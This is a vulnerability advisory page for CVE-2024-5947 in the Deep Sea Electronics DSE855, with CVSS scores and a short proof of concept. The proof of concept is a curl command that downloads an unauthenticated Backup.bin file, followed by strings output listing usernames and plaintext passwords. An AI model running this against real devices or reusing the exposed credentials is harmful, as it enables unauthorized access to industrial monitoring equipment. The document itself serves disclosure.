Lucene search

K
packetstormLiquidWorm, zeroscience.mkPACKETSTORM:179342
HistoryJul 03, 2024 - 12:00 a.m.

Deep Sea Electronics DSE855 Remote Authentication Bypass

2024-07-0300:00:00
LiquidWorm, zeroscience.mk
packetstormsecurity.com
65
deep sea electronics
dse855
remote authentication bypass
vulnerability
backup.bin
information disclosure
zsl-2024-5825
zdi-24-671
cve-2024-5947

CVSS3

6.5

Attack Vector

ADJACENT

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.1

Confidence

Low

EPSS

0.001

Percentile

29.8%

`  
Deep Sea Electronics DSE855 Remote Authentication Bypass  
  
  
Vendor: Deep Sea Electronics plc  
Product web page: https://www.deepseaelectronics.com  
Affected version: Model: DSE855  
Software version: 1.0.26  
Module version: 1.0.78  
Bootloader version: 1.0.3  
Firmware version: 1.1.0  
  
Summary: The DSE855 communications device allows monitoring of a single  
DSE controller with USB connectivity over a LAN or WAN connection. To achieve  
this the DSE855 utilises its in-built web server or MODBUS TCP. In order  
to use over a LAN connection the on-site router must be configured to be  
accessible from any global location.  
  
Desc: The device is vulnerable to configuration disclosure when direct object  
reference is made to the Backup.bin file using an HTTP GET request. This will  
enable an attacker to disclose sensitive information and help her in authentication  
bypass, privilege escalation and full system access.  
  
Tested on: embOS/IP  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2024-5825  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5825.php  
ZDI ID: ZDI-24-671  
ZDI CAN: ZDI-CAN-22679  
ZDI URL: https://www.zerodayinitiative.com/advisories/ZDI-24-671/  
ZDI Title: (0Day) Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability  
CVE ID: CVE-2024-5947  
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-5947  
  
  
10.11.2023  
  
--  
  
  
$ curl -s -O http://target/Backup.bin  
$ strings Backup.bin  
  
DSEB  
Admin  
Password1234  
Tech  
Password1234  
thricer  
scada  
rd1234  
lokna  
xela123  
DSE855  
`

CVSS3

6.5

Attack Vector

ADJACENT

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.1

Confidence

Low

EPSS

0.001

Percentile

29.8%